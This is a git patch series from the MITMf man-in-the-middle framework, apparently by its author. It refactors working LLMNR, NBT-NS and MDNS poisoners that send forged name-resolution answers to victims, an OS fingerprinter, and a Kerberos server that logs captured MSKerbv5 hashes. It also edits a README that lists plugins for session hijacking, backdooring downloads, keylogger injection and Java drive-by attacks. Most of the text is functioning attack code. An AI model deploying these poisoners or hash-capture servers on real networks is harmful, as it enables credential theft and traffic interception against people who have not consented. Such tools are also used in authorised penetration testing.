core/responder/mdns/{__init.py => __init__.py} (100%) diff --git a/core/responder/fingerprinter/LANFingerprinter.py b/core/responder/fingerprinter/LANFingerprinter.py index 3228f01..a1186f8 100644 --- a/core/responder/fingerprinter/LANFingerprinter.py +++ b/core/responder/fingerprinter/LANFingerprinter.py @@ -1,183 +1,221 @@ -################################################################################## -#Browser Listener and Lanman Finger -################################################################################## -class LANFinger(): +import socket +import threading +import struct +import logging - def serve_thread_udp(host, port, handler): - try: - server = ThreadingUDPServer((host, port), handler) - server.serve_forever() - except Exception, e: - print "Error starting UDP server on port %s: %s:" % (str(port),str(e)) +from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler +from core.configwatcher import ConfigWatcher +from core.responder.fingerprinter.RAPLANMANPackets import * - def start(): - t1 = threading.Thread(name="Browser", target=serve_thread_udp, args=("0.0.0.0", 138, Browser)) +mitmf_logger = logging.getLogger("mitmf") +class LANFingerprinter(): + + def start(self, options): + + global args; args = options #For now a quick hack to make argparse's namespace object available to all + + try: + mitmf_logger.debug("[LANFingerprinter] online") + server = ThreadingUDPServer(("0.0.0.0", 138), Browser) + t = threading.Thread(name="LANFingerprinter", target=server.serve_forever) + t.setDaemon(True) + t.start() + except Exception, e: + mitmf_logger.error("[LANFingerprinter] Error starting on port 138: {}:".format(e)) + class ThreadingUDPServer(ThreadingMixIn, UDPServer): - allow_reuse_address = 1 + allow_reuse_address = 1 - def server_bind(self): - UDPServer.server_bind(self) - -def WorkstationFingerPrint(data): - Role = { - "\x04\x00" :"Windows 95", - "\x04\x10" :"Windows 98", - "\x04\x90" :"Windows ME", - "\x05\x00" :"Windows 2000", - "\x05\x00" :"Windows XP", - "\x05\x02" :"Windows 2003", - "\x06\x00" :"Windows Vista/Server 2008", - "\x06\x01" :"Windows 7/Server 2008R2", - } - - if data in Role: - return Role[data] - else: - return False - -def PrintServerName(data, entries): - if entries == 0: - pass - else: - entrieslen = 26*entries - chunks, chunk_size = len(data[:entrieslen]), entrieslen/entries - ServerName = [data[i:i+chunk_size] for i in range(0, chunks, chunk_size) ] - l =[] - for x in ServerName: - if WorkstationFingerPrint(x[16:18]): - l.append(x[:16].replace('\x00', '')+'\n [-]Os version is:%s'%(WorkstationFingerPrint(x[16:18]))) - else: - l.append(x[:16].replace('\x00', '')) - - return l - -def ParsePacket(Payload): - PayloadOffset = struct.unpack('i", len(''.join(payload))) return length -class Packet(): - fields = OrderedDict([ - ("data", ""), - ]) - def __init__(self, **kw): - self.fields = OrderedDict(self.__class__.fields) - for k,v in kw.items(): - if callable(v): - self.fields[k] = v(self.fields[k]) - else: - self.fields[k] = v - def __str__(self): - return "".join(map(str, self.fields.values())) - - class SMBHeader(Packet): fields = OrderedDict([ ("proto", "\xff\x53\x4d\x42"), diff --git a/core/responder/llmnr/LLMNRPoisoner.py b/core/responder/llmnr/LLMNRPoisoner.py index 44b1b2d..4367753 100644 --- a/core/responder/llmnr/LLMNRPoisoner.py +++ b/core/responder/llmnr/LLMNRPoisoner.py @@ -24,11 +24,11 @@ class LLMNRPoisoner: try: mitmf_logger.debug("[LLMNRPoisoner] OURIP => {}".format(OURIP)) server = ThreadingUDPLLMNRServer(("0.0.0.0", 5355), LLMNR) - t = threading.Thread(name="LLMNR", target=server.serve_forever) #LLMNR + t = threading.Thread(name="LLMNRPoisoner", target=server.serve_forever) #LLMNR t.setDaemon(True) t.start() except Exception, e: - mitmf_logger.error("[LLMNRPoisoner] Error starting on port {}: {}:".format(5355, e)) + mitmf_logger.error("[LLMNRPoisoner] Error starting on port 5355: {}:".format(e)) class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer): @@ -97,11 +97,11 @@ class LLMNR(BaseRequestHandler): if args.finger: try: Finger = RunSmbFinger((self.client_address[0],445)) - mitmf_logger.warning("[LLMNRPoisoner] {} is looking for {} | OS: {} | Client Version: {}".format(self.client_address[0], Name,Finger[0],Finger[1])) + mitmf_logger.warning("[LLMNRPoisoner] {} is looking for: {} | OS: {} | Client Version: {}".format(self.client_address[0], Name,Finger[0],Finger[1])) except Exception: - mitmf_logger.warning("[LLMNRPoisoner] {} is looking for {}".format(self.client_address[0], Name)) + mitmf_logger.warning("[LLMNRPoisoner] {} is looking for: {}".format(self.client_address[0], Name)) else: - mitmf_logger.warning("[LLMNRPoisoner] {} is looking for {}".format(self.client_address[0], Name)) + mitmf_logger.warning("[LLMNRPoisoner] {} is looking for: {}".format(self.client_address[0], Name)) if DontRespondToSpecificHost(DontRespondTo): if RespondToIPScope(DontRespondTo, self.client_address[0]): @@ -118,15 +118,11 @@ class LLMNR(BaseRequestHandler): buff.calculate() for x in range(1): soc.sendto(str(buff), self.client_address) - #mitmf_logger.info(Message) - mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was : {}".format(self.client_address[0],Name)) + mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was: {}".format(self.client_address[0],Name)) if args.finger: try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[LLMNRPoisoner] OsVersion is:%s'%(Finger[0]) - #print '[LLMNRPoisoner] ClientVersion is :%s'%(Finger[1]) - mitmf_logger.info('[LLMNRPoisoner] OsVersion is:{}'.format(Finger[0])) - mitmf_logger.info('[LLMNRPoisoner] ClientVersion is :{}'.format(Finger[1])) + mitmf_logger.info('[LLMNRPoisoner] OS: {} | ClientVersion: {}'.format(Finger[0], Finger[1])) except Exception: mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0])) pass @@ -136,14 +132,11 @@ class LLMNR(BaseRequestHandler): buff.calculate() for x in range(1): soc.sendto(str(buff), self.client_address) - mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was : {}".format(self.client_address[0],Name)) + mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was: {}".format(self.client_address[0],Name)) if args.finger: try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[LLMNRPoisoner] OsVersion is:%s'%(Finger[0]) - #print '[LLMNRPoisoner] ClientVersion is :%s'%(Finger[1]) - mitmf_logger.info('[LLMNRPoisoner] OsVersion is:{}'.format(Finger[0])) - mitmf_logger.info('[LLMNRPoisoner] ClientVersion is :{}'.format(Finger[1])) + mitmf_logger.info('[LLMNRPoisoner] OS: {} | ClientVersion: {}'.format(Finger[0], Finger[1])) except Exception: mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0])) pass @@ -154,14 +147,11 @@ class LLMNR(BaseRequestHandler): buff.calculate() for x in range(1): soc.sendto(str(buff), self.client_address) - mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was : {}".format(self.client_address[0], Name)) + mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was: {}".format(self.client_address[0], Name)) if args.finger: try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[LLMNRPoisoner] OsVersion is:%s'%(Finger[0]) - #print '[LLMNRPoisoner] ClientVersion is :%s'%(Finger[1]) - mitmf_logger.info('[LLMNRPoisoner] OsVersion is: {}'.format(Finger[0])) - mitmf_logger.info('[LLMNRPoisoner] ClientVersion is : {}'.format(Finger[1])) + mitmf_logger.info('[LLMNRPoisoner] OS: {} | ClientVersion: {}'.format(Finger[0], Finger[1])) except Exception: mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0])) pass @@ -170,12 +160,11 @@ class LLMNR(BaseRequestHandler): buff.calculate() for x in range(1): soc.sendto(str(buff), self.client_address) - mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was : {}".format(self.client_address[0], Name)) + mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was: {}".format(self.client_address[0], Name)) if args.finger: try: Finger = RunSmbFinger((self.client_address[0],445)) - mitmf_logger.info('[LLMNRPoisoner] OsVersion is: {}'.format(Finger[0])) - mitmf_logger.info('[LLMNRPoisoner] ClientVersion is : {}'.format(Finger[1])) + mitmf_logger.info('[LLMNRPoisoner] OS: {} | ClientVersion: {}'.format(Finger[0], Finger[1])) except Exception: mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0])) pass diff --git a/core/responder/mdns/MDNSPoisoner.py b/core/responder/mdns/MDNSPoisoner.py index e8bbb77..eda54d1 100644 --- a/core/responder/mdns/MDNSPoisoner.py +++ b/core/responder/mdns/MDNSPoisoner.py @@ -1,22 +1,33 @@ #! /usr/bin/env python2.7 -from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler import threading +import socket import struct +import logging -from core.protocols.odict import OrderedDict -from core.protocols.packet import Packet +from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler +from core.configwatcher import ConfigWatcher +from core.responder.odict import OrderedDict +from core.responder.packet import Packet +from core.responder.common import * + +mitmf_logger = logging.getLogger("mitmf") class MDNSPoisoner(): - def start(): + def start(self, options, ourip): + + global args; args = options + global OURIP; OURIP = ourip + try: + mitmf_logger.debug("[MDNSPoisoner] OURIP => {}".format(OURIP)) server = ThreadingUDPMDNSServer(("0.0.0.0", 5353), MDNS) - t = threading.Thread(name="MDNS", target=server.serve_forever) + t = threading.Thread(name="MDNSPoisoner", target=server.serve_forever) t.setDaemon(True) t.start() except Exception, e: - print "Error starting MDNSPoisoner on port %s: %s:" % (str(port),str(e)) + print "[MDNSPoisoner] Error starting on port 5353: {}" .format(e) class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer): @@ -26,9 +37,8 @@ class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer): MADDR = "224.0.0.251" self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1) self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255) - Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,inet_aton(MADDR)+inet_aton(OURIP)) - - UDPServer.server_bind(self + Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MADDR)+ socket.inet_aton(OURIP)) + UDPServer.server_bind(self) class MDNSAns(Packet): fields = OrderedDict([ @@ -67,32 +77,34 @@ def Poisoned_MDNS_Name(data): class MDNS(BaseRequestHandler): def handle(self): + + ResponderConfig = ConfigWatcher.getInstance().getConfig()['Responder'] + RespondTo = ResponderConfig['RespondTo'] + MADDR = "224.0.0.251" MPORT = 5353 data, soc = self.request if self.client_address[0] == "127.0.0.1": pass try: - if AnalyzeMode: + if args.analyze: if Parse_IPV6_Addr(data): - #print '[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data)) - responder_logger.info('[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data))) + mitmf_logger.info('[MDNSPoisoner] {} is looking for: {}'.format(self.client_address[0],Parse_MDNS_Name(data))) if RespondToSpecificHost(RespondTo): - if AnalyzeMode == False: + if args.analyze == False: if RespondToIPScope(RespondTo, self.client_address[0]): if Parse_IPV6_Addr(data): - #print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)) - responder_logger.info('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))) + + mitmf_logger.info('[MDNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0],Parse_MDNS_Name(data))) Name = Poisoned_MDNS_Name(data) MDns = MDNSAns(AnswerName = Name) MDns.calculate() soc.sendto(str(MDns),(MADDR,MPORT)) - if AnalyzeMode == False and RespondToSpecificHost(RespondTo) == False: + if args.analyze == False and RespondToSpecificHost(RespondTo) == False: if Parse_IPV6_Addr(data): - #print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)) - responder_logger.info('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))) + mitmf_logger.info('[MDNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0],Parse_MDNS_Name(data))) Name = Poisoned_MDNS_Name(data) MDns = MDNSAns(AnswerName = Name) MDns.calculate() diff --git a/core/responder/mdns/__init.py b/core/responder/mdns/__init__.py similarity index 100% rename from core/responder/mdns/__init.py rename to core/responder/mdns/__init__.py diff --git a/core/responder/nbtns/NBTNSPoisoner.py b/core/responder/nbtns/NBTNSPoisoner.py index 1d4c071..f67160f 100644 --- a/core/responder/nbtns/NBTNSPoisoner.py +++ b/core/responder/nbtns/NBTNSPoisoner.py @@ -1,18 +1,34 @@ #! /usr/bin/env python2.7 -from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler import threading +import socket import struct +import logging +from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler +from core.configwatcher import ConfigWatcher +from core.responder.fingerprinter.Fingerprint import RunSmbFinger +from core.responder.odict import OrderedDict from core.responder.packet import Packet +from core.responder.common import * + +mitmf_logger = logging.getLogger("mitmf") class NBTNSPoisoner(): - def start(): - server = ThreadingUDPServer(("0.0.0.0", 137), NB) - t = threading.Thread(name="NBNS", target=server.serve_forever()) #NBNS - t.setDaemon(True) - t.start() + def start(self, options, ourip): + + global OURIP; OURIP = ourip + global args; args = options + + try: + mitmf_logger.debug("[NBTNSPoisoner] OURIP => {}".format(ourip)) + server = ThreadingUDPServer(("0.0.0.0", 137), NB) + t = threading.Thread(name="NBTNSPoisoner", target=server.serve_forever) + t.setDaemon(True) + t.start() + except Exception, e: + mitmf_logger.debug("[NBTNSPoisoner] Error starting on port 137: {}".format(e)) class ThreadingUDPServer(ThreadingMixIn, UDPServer): @@ -42,17 +58,17 @@ class NBT_Ans(Packet): def calculate(self,data): self.fields["Tid"] = data[0:2] self.fields["NbtName"] = data[12:46] - self.fields["IP"] = inet_aton(OURIP) + self.fields["IP"] = socket.inet_aton(OURIP) def NBT_NS_Role(data): Role = { - "\x41\x41\x00":"Workstation/Redirector Service.", - "\x42\x4c\x00":"Domain Master Browser. This name is likely a domain controller or a homegroup.)", - "\x42\x4d\x00":"Domain controller service. This name is a domain controller.", - "\x42\x4e\x00":"Local Master Browser.", - "\x42\x4f\x00":"Browser Election Service.", - "\x43\x41\x00":"File Server Service.", - "\x41\x42\x00":"Browser Service.", + "\x41\x41\x00":"Workstation/Redirector Service", + "\x42\x4c\x00":"Domain Master Browser", + "\x42\x4d\x00":"Domain controller service", + "\x42\x4e\x00":"Local Master Browser", + "\x42\x4f\x00":"Browser Election Service", + "\x43\x41\x00":"File Server Service", + "\x41\x42\x00":"Browser Service", } if data in Role: @@ -62,13 +78,13 @@ def NBT_NS_Role(data): # Define what are we answering to. def Validate_NBT_NS(data,Wredirect): - if AnalyzeMode: + if args.analyze: return False if NBT_NS_Role(data[43:46]) == "File Server Service.": return True - if NBTNSDomain == True: + if args.nbtns == True: if NBT_NS_Role(data[43:46]) == "Domain controller service. This name is a domain controller.": return True @@ -96,6 +112,13 @@ def Decode_Name(nbname): class NB(BaseRequestHandler): def handle(self): + + ResponderConfig = ConfigWatcher.getInstance().getConfig()['Responder'] + DontRespondTo = ResponderConfig['DontRespondTo'] + DontRespondToName = ResponderConfig['DontRespondToName'] + RespondTo = ResponderConfig['RespondTo'] + RespondToName = ResponderConfig['RespondToName'] + data, socket = self.request Name = Decode_Name(data[13:45]) @@ -106,59 +129,46 @@ class NB(BaseRequestHandler): if DontRespondToSpecificName(DontRespondToName) and DontRespondToNameScope(DontRespondToName.upper(), Name.upper()): return None - if AnalyzeMode: + if args.analyze: if data[2:4] == "\x01\x10": - if Is_Finger_On(Finger_On_Off): + if args.finger: try: Finger = RunSmbFinger((self.client_address[0],445)) - Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s.\nOs Version is: %s Client Version is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]),Finger[0],Finger[1]) - logger3.warning(Message) + mitmf_logger.warning("[NBTNSPoisoner] {} is looking for: {} | Service requested: {} | OS: {} | Client Version: {}".format(self.client_address[0], Name,NBT_NS_Role(data[43:46]),Finger[0],Finger[1])) except Exception: - Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s\n"%(self.client_address[0], Name,NBT_NS_Role(data[43:46])) - logger3.warning(Message) + mitmf_logger.warning("[NBTNSPoisoner] {} is looking for: {} | Service requested is: {}".format(self.client_address[0], Name, NBT_NS_Role(data[43:46]))) else: - Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46])) - logger3.warning(Message) + mitmf_logger.warning("[NBTNSPoisoner] {} is looking for: {} | Service requested is: {}".format(self.client_address[0], Name, NBT_NS_Role(data[43:46]))) - if RespondToSpecificHost(RespondTo) and AnalyzeMode == False: + if RespondToSpecificHost(RespondTo) and args.analyze == False: if RespondToIPScope(RespondTo, self.client_address[0]): if data[2:4] == "\x01\x10": - if Validate_NBT_NS(data,Wredirect): + if Validate_NBT_NS(data,args.wredir): if RespondToSpecificName(RespondToName) == False: buff = NBT_Ans() buff.calculate(data) for x in range(1): socket.sendto(str(buff), self.client_address) - Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) - #responder_logger.info(Message) - logger2.warning(Message) - if Is_Finger_On(Finger_On_Off): + mitmf_logger.warning('[NBTNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0], Name)) + if args.finger: try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - #print '[+] ClientVersion is :%s'%(Finger[1]) - responder_logger.info('[+] OsVersion is:%s'%(Finger[0])) - responder_logger.info('[+] ClientVersion is :%s'%(Finger[1])) + mitmf_logger.info("[NBTNSPoisoner] OS: {} | ClientVersion: {}".format(Finger[0],Finger[1])) except Exception: - responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0])) + mitmf_logger.info('[NBTNSPoisoner] Fingerprint failed for host: %s'%(self.client_address[0])) pass if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()): buff = NBT_Ans() buff.calculate(data) for x in range(1): socket.sendto(str(buff), self.client_address) - Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) - #responder_logger.info(Message) - logger2.warning(Message) - if Is_Finger_On(Finger_On_Off): + mitmf_logger.warning('[NBTNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0], Name)) + if args.finger: try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - #print '[+] ClientVersion is :%s'%(Finger[1]) - responder_logger.info('[+] OsVersion is:%s'%(Finger[0])) - responder_logger.info('[+] ClientVersion is :%s'%(Finger[1])) + mitmf_logger.info("[NBTNSPoisoner] OS: {} | ClientVersion: {}".format(Finger[0],Finger[1])) except Exception: - responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0])) + mitmf_logger.info('[NBTNSPoisoner] Fingerprint failed for host: %s'%(self.client_address[0])) pass else: pass @@ -167,42 +177,32 @@ class NB(BaseRequestHandler): else: if data[2:4] == "\x01\x10": - if Validate_NBT_NS(data,Wredirect) and AnalyzeMode == False: + if Validate_NBT_NS(data,args.wredir) and args.analyze == False: if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()): buff = NBT_Ans() buff.calculate(data) for x in range(1): socket.sendto(str(buff), self.client_address) - Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) - #responder_logger.info(Message) - logger2.warning(Message) - if Is_Finger_On(Finger_On_Off): + mitmf_logger.warning('[NBTNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0], Name)) + if args.finger: try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - #print '[+] ClientVersion is :%s'%(Finger[1]) - responder_logger.info('[+] OsVersion is:%s'%(Finger[0])) - responder_logger.info('[+] ClientVersion is :%s'%(Finger[1])) + mitmf_logger.info("[NBTNSPoisoner] OS: {} | ClientVersion: {}".format(Finger[0],Finger[1])) except Exception: - responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0])) + mitmf_logger.info('[NBTNSPoisoner] Fingerprint failed for host: %s'%(self.client_address[0])) pass if RespondToSpecificName(RespondToName) == False: buff = NBT_Ans() buff.calculate(data) for x in range(1): socket.sendto(str(buff), self.client_address) - Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) - #responder_logger.info(Message) - logger2.warning(Message) - if Is_Finger_On(Finger_On_Off): + mitmf_logger.warning('[NBTNSPoisoner] Poisoned answer sent to {} the requested name was: {}'.format(self.client_address[0], Name)) + if args.finger: try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - #print '[+] ClientVersion is :%s'%(Finger[1]) - responder_logger.info('[+] OsVersion is:%s'%(Finger[0])) - responder_logger.info('[+] ClientVersion is :%s'%(Finger[1])) + mitmf_logger.info("[NBTNSPoisoner] OS: {} | ClientVersion: {}".format(Finger[0],Finger[1])) except Exception: - responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0])) + mitmf_logger.info('[NBTNSPoisoner] Fingerprint failed for host: %s'%(self.client_address[0])) pass else: pass \ No newline at end of file diff --git a/plugins/Responder.py b/plugins/Responder.py index 676553f..b83891a 100644 --- a/plugins/Responder.py +++ b/plugins/Responder.py @@ -24,9 +24,12 @@ import threading from plugins.plugin import Plugin from twisted.internet import reactor -from core.responder.wpad.WPADPoisoner import WPADPoisoner -from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner from core.utils import SystemConfig +from core.responder.llmnr.LLMNRPoisoner import LLMNRPoisoner +from core.responder.wpad.WPADPoisoner import WPADPoisoner +from core.responder.mdns.MDNSPoisoner import MDNSPoisoner +from core.responder.nbtns.NBTNSPoisoner import NBTNSPoisoner +from core.responder.fingerprinter.LANFingerprinter import LANFingerprinter class Responder(Plugin): name = "Responder" @@ -48,6 +51,9 @@ class Responder(Plugin): sys.exit('[-] Error parsing config for Responder: ' + str(e)) LLMNRPoisoner().start(options, self.ourip) + MDNSPoisoner().start(options, self.ourip) + NBTNSPoisoner().start(options, self.ourip) + LANFingerprinter().start(options) if options.wpad: WPADPoisoner().start() From 2c6e9a31b7a8b2feafc8f05be9c2ac1e1cb264a0 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Tue, 28 Apr 2015 13:08:56 +0200 Subject: [PATCH 05/20] modded readme --- README.md | 36 ++++++++++++++++-------------------- 1 file changed, 16 insertions(+), 20 deletions(-) diff --git a/README.md b/README.md index be59559..126f226 100644 --- a/README.md +++ b/README.md @@ -9,26 +9,6 @@ This tool is based on [sergio-proxy](https://github.com/supernothing/sergio-prox **Before submitting issues please read the [FAQ](#faq) and the appropriate [section](#submitting-issues).** -(Another) Dependency change! -============================ -As of v0.9.6, the fork of the ```python-netfilterqueue``` library is no longer required. - -How to install on Kali -====================== - -```apt-get install mitmf``` - -**Currently Kali has a very old version of MITMf in it's repos so if you find bugs its normal, don't open an issue! Read the [Installation](#installation) section to get the latest version** - -Installation -============ -If MITMf is not in your distros repo or you just want the latest version: -- clone this repository -- run the ```setup.sh``` script -- run the command ```pip install -r requirements.txt``` to install all python dependencies - -On Kali Linux, if you get an error while installing the pypcap package or when starting MITMf you see: ```ImportError: no module named pcap``` run ```apt-get install python-pypcap``` to fix it. - Availible plugins ================= - Responder - LLMNR, NBT-NS and MDNS poisoner @@ -76,6 +56,22 @@ Changelog - Addition of the app-cache poisoning attack by [Krzysztof Kotowicz](https://github.com/koto/sslstrip) (blogpost explaining the attack here http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html) +Installation +============ +If MITMf is not in your distros repo or you just want the latest version: +- clone this repository +- run the ```setup.sh``` script +- run the command ```pip install -r requirements.txt``` to install all python dependencies + +On Kali Linux, if you get an error while installing the pypcap package or when starting MITMf you see: ```ImportError: no module named pcap``` run ```apt-get install python-pypcap``` to fix it. + +How to install on Kali +====================== + +```apt-get install mitmf``` + +**Currently Kali has a very old version of MITMf in it's repos so if you find bugs its normal, don't open an issue! Read the [Installation](#installation) section to get the latest version** + Submitting Issues ================= If you have *questions* regarding the framework please email me at byt3bl33d3r@gmail.com From 6b421d1cac74cf06eff7577ad37d8cb70d7fcdef Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Tue, 28 Apr 2015 13:10:36 +0200 Subject: [PATCH 06/20] typo --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 126f226..73ca447 100644 --- a/README.md +++ b/README.md @@ -20,7 +20,7 @@ Availible plugins - SessionHijacking - Performs session hijacking attacks, and stores cookies in a firefox profile - BrowserProfiler - Attempts to enumerate all browser plugins of connected clients - CacheKill - Kills page caching by modifying headers -- FilePwn - Backdoor executables being sent over http using bdfactory +- FilePwn - Backdoor executables being sent over http using Backdoor Factory and BDFProxy - Inject - Inject arbitrary content into HTML content - JavaPwn - Performs drive-by attacks on clients with out-of-date java browser plugins - jskeylogger - Injects a javascript keylogger into clients webpages From aa4e022ab0ec9a122dfc505c2e2388cda26963dd Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Thu, 30 Apr 2015 00:10:55 +0200 Subject: [PATCH 07/20] Kerberos sever back online, squashed some bugs --- .../fingerprinter/LANFingerprinter.py | 16 +++- .../kerberos/KERBServer.py | 90 +++++++++---------- .../kerberos/__init__.py | 0 core/responder/nbtns/NBTNSPoisoner.py | 4 +- core/responder/wpad/WPADPoisoner.py | 48 +++++----- mitmf.py | 1 + plugins/Responder.py | 11 ++- 7 files changed, 93 insertions(+), 77 deletions(-) rename core/{protocols => responder}/kerberos/KERBServer.py (75%) rename core/{protocols => responder}/kerberos/__init__.py (100%) diff --git a/core/responder/fingerprinter/LANFingerprinter.py b/core/responder/fingerprinter/LANFingerprinter.py index a1186f8..aa0c9e1 100644 --- a/core/responder/fingerprinter/LANFingerprinter.py +++ b/core/responder/fingerprinter/LANFingerprinter.py @@ -3,9 +3,9 @@ import socket import threading import struct import logging +import string from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler -from core.configwatcher import ConfigWatcher from core.responder.fingerprinter.RAPLANMANPackets import * mitmf_logger = logging.getLogger("mitmf") @@ -60,6 +60,20 @@ def NBT_NS_Role(data): else: return "Service not known." +def Decode_Name(nbname): + #From http://code.google.com/p/dpkt/ with author's permission. + try: + if len(nbname) != 32: + return nbname + l = [] + for i in range(0, 32, 2): + l.append(chr(((ord(nbname[i]) - 0x41) << 4) | + ((ord(nbname[i+1]) - 0x41) & 0xf))) + return filter(lambda x: x in string.printable, ''.join(l).split('\x00', 1)[0].replace(' ', '')) + except Exception, e: + mitmf_logger.debug("[LANFingerprinter] Error parsing NetBIOS name: {}".format(e)) + return "Illegal NetBIOS name" + def WorkstationFingerPrint(data): Role = { "\x04\x00" :"Windows 95", diff --git a/core/protocols/kerberos/KERBServer.py b/core/responder/kerberos/KERBServer.py similarity index 75% rename from core/protocols/kerberos/KERBServer.py rename to core/responder/kerberos/KERBServer.py index 40b509f..7b6e6cf 100644 --- a/core/protocols/kerberos/KERBServer.py +++ b/core/responder/kerberos/KERBServer.py @@ -1,35 +1,37 @@ -################################################################################## -#Kerberos Server stuff starts here -################################################################################## + +import socket +import threading +import struct +import logging + +from SocketServer import UDPServer, TCPServer, ThreadingMixIn, BaseRequestHandler + +mitmf_logger = logging.getLogger("mitmf") class KERBServer(): - def serve_thread_udp(host, port, handler): + def serve_thread_udp(self, host, port, handler): try: server = ThreadingUDPServer((host, port), handler) server.serve_forever() except Exception, e: - print "Error starting UDP server on port %s: %s:" % (str(port),str(e)) + mitmf_logger.debug("[KERBServer] Error starting UDP server on port 88: {}:".format(e)) - def serve_thread_tcp(host, port, handler): + def serve_thread_tcp(self, host, port, handler): try: server = ThreadingTCPServer((host, port), handler) server.serve_forever() except Exception, e: - print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) + mitmf_logger.debug("[KERBServer] Error starting TCP server on port 88: {}:".format(e)) #Function name self-explanatory - def start(Krb_On_Off): - if Krb_On_Off == "ON": - t1 = threading.Thread(name="KerbUDP", target=serve_thread_udp, args=("0.0.0.0", 88,KerbUDP)) - t2 = threading.Thread(name="KerbTCP", target=serve_thread_tcp, args=("0.0.0.0", 88, KerbTCP)) - for t in [t1,t2]: - t.setDaemon(True) - t.start() - - return t1, t2 - if Krb_On_Off == "OFF": - return False + def start(self): + mitmf_logger.debug("[KERBServer] online") + t1 = threading.Thread(name="KERBServerUDP", target=self.serve_thread_udp, args=("0.0.0.0", 88,KerbUDP)) + t2 = threading.Thread(name="KERBServerTCP", target=self.serve_thread_tcp, args=("0.0.0.0", 88, KerbTCP)) + for t in [t1,t2]: + t.setDaemon(True) + t.start() class ThreadingUDPServer(ThreadingMixIn, UDPServer): @@ -45,6 +47,28 @@ class ThreadingTCPServer(ThreadingMixIn, TCPServer): def server_bind(self): TCPServer.server_bind(self) +class KerbTCP(BaseRequestHandler): + + def handle(self): + try: + data = self.request.recv(1024) + KerbHash = ParseMSKerbv5TCP(data) + if KerbHash: + mitmf_logger.info('[KERBServer] MSKerbv5 complete hash is: {}'.format(KerbHash)) + except Exception: + raise + +class KerbUDP(BaseRequestHandler): + + def handle(self): + try: + data, soc = self.request + KerbHash = ParseMSKerbv5UDP(data) + if KerbHash: + mitmf_logger.info('[KERBServer] MSKerbv5 complete hash 